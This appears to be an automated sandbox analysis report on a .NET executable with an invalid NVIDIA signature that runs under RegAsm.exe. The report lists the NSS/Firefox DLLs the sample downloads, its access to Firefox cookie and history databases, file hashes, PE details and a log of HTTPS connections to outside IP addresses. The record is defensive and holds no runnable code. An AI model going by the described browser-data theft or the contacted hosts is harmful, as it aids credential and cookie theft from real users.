C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.46857610618117
Encrypted:	false
SSDEEP:	6144:DzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNbjDH5S:/ZHtBZWOKnMM6bFp9j4
MD5:	10A17ED49A8794C7EA4A2124BDFE0326
SHA1:	FB5FC143BB963F4F31F6F0BE4B943E81DA29CE5B
SHA-256:	67C81975E523109AC068FA08EC0EB593A36B76D2DB1D8438DF9DE68F37D47A37
SHA-512:	791E97F4F1E40B8159B1E60F816BC280BA313E98110CD4204480C32204DEE31454072021D71F6B29DC78995D0233895B77162437CAE748F7C071D8F95758BA9D
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.;E.G.................................................................................................................................................................................................................................................................................................................................................R4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.949031506500858
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	229'512 bytes
MD5:	78f23006210bda6b5e26b8cbefa9758a
SHA1:	b1a191597f5a2ecdd3b9185b89072cfae06ae5cd
SHA256:	631acc4c860b0628e08895af0c2c9dd0c7af17f32da4cd1e2e22e85a1f534907
SHA512:	cf073cd4df9b13a9c79d9908952b88e9aef7c57c208031a6a758b2e3176841dfaa90206228af0c6a08c3b266b06fcd46d00ebde9c98906408affec9fbd9d0cc2
SSDEEP:	6144:No9+UOY1p3TTTFt/rIQuwkpAoVBIiNeXtd5yE:NEOAZtXtueXtdR
TLSH:	442412E24FBC4801D85BCA31BA91D3989E71AB480BA1D7EB204DD2145F96FD2EF45336
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................(...........F... ...`....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x43460e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6605A48C [Thu Mar 28 17:10:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	18/10/2022 02:00:00 16/10/2025 01:59:59
Subject Chain	CN=NVIDIA Corporation, OU=1-F, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	ADDD0E5C2C1FCB87E286ABF0F7292AF3
Thumbprint SHA-1:	01DF5BFEFA251B27AC1933E4E4CB61F21C44D57B
Thumbprint SHA-256:	CCDDF490761FD36F95BB22F6593DE9E2AC4BB190A617F1090DC9224E2713888D
Serial:	0D0194CD1E3142205135D1C636E4E9BA

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x345b4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x36000	0x548	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x33200	0x4e88
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x38000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3447c	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x32614	0x32800	26b3e226b83fda4d27bc67b41277293c	False	0.9743289758663366	SysEx File -	7.973456730840853	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x36000	0x548	0x600	8e69e26ec38d7e248cd0c9678a805336	False	0.4055989583333333	data	3.9381431729249687	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x38000	0xc	0x200	c54019d987faad8c8d639fe08d688414	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x360a0	0x2b4	data			0.4595375722543353
RT_MANIFEST	0x36358	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 28, 2024 20:34:51.437218904 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:51.437258959 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:51.437335014 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:51.488092899 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:51.488107920 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:51.701456070 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:51.701539040 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:51.822384119 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:51.822400093 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:51.822748899 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:51.823868036 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:51.842295885 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:51.888256073 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.094666004 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.094700098 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.094715118 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.094779015 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.094805956 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.094835043 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.094873905 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.197432995 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.197484970 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.197586060 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.197617054 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.197632074 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.197663069 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.214752913 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.214791059 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.214829922 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.214868069 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.214889050 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.215552092 CET	49700	443	192.168.2.6	104.105.90.131
Mar 28, 2024 20:34:52.215576887 CET	443	49700	104.105.90.131	192.168.2.6
Mar 28, 2024 20:34:52.249963045 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:52.250013113 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:52.250119925 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:52.250392914 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:52.250406027 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:52.851378918 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:52.851572990 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:52.895927906 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:52.895953894 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:52.896312952 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:52.896425962 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:52.896770000 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:52.944237947 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:53.325067997 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:53.325150013 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:53.325221062 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.326363087 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.327948093 CET	49701	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.327967882 CET	443	49701	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:53.330043077 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.330084085 CET	443	49703	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:53.330174923 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.330388069 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.330399990 CET	443	49703	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:53.711730003 CET	443	49703	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:53.711795092 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.712321997 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.712332964 CET	443	49703	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:53.714529991 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:53.714535952 CET	443	49703	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:54.397923946 CET	443	49703	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:54.397986889 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.397995949 CET	443	49703	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:54.398039103 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.398267984 CET	49703	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.398282051 CET	443	49703	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:54.400068045 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.400099993 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:54.400157928 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.400971889 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.400985956 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:54.782974005 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:54.783044100 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.783459902 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.783467054 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:54.794332027 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:54.794337988 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.483704090 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.483730078 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.483772993 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.483783960 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.483798027 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.483803034 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.483831882 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.483859062 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.484128952 CET	49706	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.484138966 CET	443	49706	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.486138105 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.486172915 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.486255884 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.486435890 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.486445904 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.866358995 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.870124102 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.876003027 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.876008987 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:55.882606983 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:55.882616043 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:56.568464041 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:56.568494081 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:56.568552971 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:56.568569899 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:56.568603992 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:56.569758892 CET	49710	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:56.569778919 CET	443	49710	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:56.685967922 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:56.686008930 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:56.686100960 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:56.686583042 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:56.686599016 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.066405058 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.066520929 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.067101955 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.067112923 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.069128990 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.069137096 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.069209099 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.069224119 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.678406954 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.678445101 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.678528070 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.678913116 CET	49714	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.678925991 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.807045937 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.807200909 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.807225943 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.807285070 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.807290077 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.807303905 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:57.807327986 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.807352066 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.808080912 CET	49713	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:34:57.808094025 CET	443	49713	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.059436083 CET	443	49714	78.46.229.36	192.168.2.6
Mar 28, 2024 20:34:58.059510946 CET	49714	443	192.168.2.6	78.46.229.36
